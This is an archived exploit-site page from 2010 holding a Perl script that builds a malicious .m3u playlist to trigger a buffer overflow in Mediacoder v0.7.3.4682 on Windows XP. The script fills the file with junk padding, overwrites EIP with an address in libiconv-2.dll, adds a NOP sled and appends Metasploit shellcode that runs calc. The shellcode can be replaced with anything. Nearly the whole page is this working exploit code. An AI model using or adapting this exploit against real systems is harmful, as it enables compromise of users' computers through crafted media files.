Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow
Posted on 24 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================== Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit ==================================================================== #!/usr/bin/perl ################################################################### #Exploit Title : Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit #tested on windows xp SP 2 (FR) #Date:24/07/2010 #download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.html #Author: s-dz [s-dz[at]HotmaiL.fr] # Tjrs mahboul-3lik ;) ################################################################### $file= "mahboul-3lik.m3u"; my $junk = "x41" x 256; my $eip = pack('V', 0x66086687);# libiconv-2.dll my $nop ="x90"x 24; # windows/exec # http://www.metasploit.com # EXITFUNC=thread, CMD=calc my $sec = "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE, ">$file"); print($FILE $junk.$eip.$nop.$sec); close($FILE); print("exploit created successfully"); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>